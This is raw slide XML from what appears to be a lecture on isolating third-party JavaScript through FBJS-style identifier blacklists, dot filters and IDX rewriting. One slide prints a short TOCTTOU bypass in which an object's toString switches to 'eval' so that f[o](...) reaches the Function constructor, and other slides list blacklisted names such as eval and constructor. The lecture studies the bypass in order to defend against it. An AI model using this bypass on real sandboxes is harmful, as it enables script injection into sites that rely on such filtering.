              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>this.x</a:t>
            </a:r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;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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2510135"/>
            <a:ext cx="36945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660066"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval(“x</a:t>
            </a:r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  <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>this.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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2192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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> access the global variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill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1679376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3464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>YES!!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delete the local declaration of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x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2133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Calibri"/>
              </a:rPr>
              <a:t>OR, get hold of the global scope  object and access its fields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2921913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Calibri"/>
              </a:rPr>
              <a:t>dynamically generate this code!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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337316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Calibri"/>
              </a:rPr>
              <a:t>Also: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>try-catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C0504D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8600" y="4343400"/>
            <a:ext cx="8763000" cy="14888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OK, let’s not do a scope analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. We are stuck with:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="512064" indent="-283464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every identifier or property lookup could potentially resolve to a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="512064" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> global variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="374904" indent="-283464">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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4" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26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Design Problem: Restatement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143000"/>
            <a:ext cx="8839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(Conservative) Reformulation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does NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access any identifiers or properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>named in blacklist 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2590800"/>
            <a:ext cx="8001000" cy="1485900"/>
            <a:chOff x="304800" y="2781300"/>
            <a:chExt cx="8001000" cy="1485900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4419605" y="2781300"/>
              <a:ext cx="1498595" cy="1409700"/>
              <a:chOff x="4419600" y="5181600"/>
              <a:chExt cx="1284509" cy="1104900"/>
            </a:xfrm>
            <a:effectLst/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Manual Operation 14"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="4438650" y="5162550"/>
                <a:ext cx="1104900" cy="1143000"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartManualOperati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84910" y="5401272"/>
                <a:ext cx="1219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Filter &amp; Rewriter</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5871497" y="3294887"/>
              <a:ext cx="910303" cy="36271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3241357"/>
              <a:ext cx="1295400" cy="49244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3276600" y="3276600"/>
              <a:ext cx="910303" cy="36271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2781300"/>
              <a:ext cx="2895599" cy="14859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rew(s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p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Calibri"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>does not access any identifiers or properties named in </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill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3745468"/>
              <a:ext cx="129540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Third-party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600" y="4286072"/>
            <a:ext cx="883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Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: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/>
              <a:t>Disallow dynamic code generation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/>
              <a:t>Filter or rewrite all identifier and property access mechanisms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the Blacklist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22699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904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Identifiers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifier Filter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>  filter all terms that have an identifier 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x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>∈ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-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9144000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Dynamic Code Generation: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eval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Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> constructor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can be accessed via properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“Function”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“constructor”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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>add these to the blacklist </a:t>
            </a:r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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2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373505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904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>e.x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="740664" lvl="1" indent="-283464">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dot Filter:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> filter all terms that have a sub-term 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e.x</a:t>
            </a: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dirty="0" smtClean="0"/>
              <a:t>with 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x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092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∈ 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B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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9705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904" indent="-283464">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dynamic Property lookup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>e1[e2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-347472">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"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IDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Rewriting:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> rewrite  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>e1[e2] → e1[IDX(e2)]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-347472">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>also used by FBJS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863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are the identifier and property access mechanisms in JS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FBJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>09</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> IDX 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839200" cy="1981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alibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Semantics of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>FBJS.IDX(e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-365760">
              <a:buFont typeface="+mj-lt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evaluate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-365760">
              <a:buFont typeface="+mj-lt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convert (1) to a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-365760">
              <a:buFont typeface="+mj-lt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if (2) is blacklisted return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“bad”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, else return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TOCTTOU attack (Safari)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Pass an object that returns different values on consecutive string conversions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3905072"/>
            <a:ext cx="9677400" cy="2190928"/>
            <a:chOff x="0" y="3955198"/>
            <a:chExt cx="9677400" cy="2190928"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="3955198"/>
              <a:ext cx="8382000" cy="21909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4038600"/>
              <a:ext cx="95250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var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o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= GET_SCOPE;</a:t>
              </a:r>
            </a:p>
            <a:p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o.toString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= function(){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				  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this.toString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=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function(){return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“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eval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”;}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				   return “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foo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”};</a:t>
              </a:r>
            </a:p>
            <a:p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var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f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= function(){};</a:t>
              </a:r>
            </a:p>
            <a:p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f[o](‘alert(“hacked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”)’)();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IDX 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1676400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDX Initialization: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124200"/>
            <a:ext cx="9067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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>IDX Rewriting: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endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092"/>
              </a:solidFill>
              <a:latin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410200"/>
            <a:ext cx="906780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Semantics preserving for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e1[e2]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when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is not blacklisted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3713905"/>
            <a:ext cx="8610600" cy="1696295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IDX(e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) ≡ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>$=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092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		    {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toString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				 function(){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76092"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>				    return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>($=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>String($),$Bl[$]?"bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>":$)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="376092"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}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76092"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>			 });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080389"/>
            <a:ext cx="8610600" cy="967611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$String = String; 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$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Bl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= {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eval:true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,...,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constructor:true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};</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="376092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143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Blacklist all variable names beginning with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“$”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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50" y="2743200"/>
            <a:ext cx="8918050" cy="2514600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>as ES3 with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identifer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and Dot filters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>Define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>rew</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)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" charset="0"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>(B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>using 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IDX rewriting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="283464" indent="-283464"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be the heap obtained by executing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>IDX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Calibri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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>initialization </a:t>
            </a:r>
            <a:r>
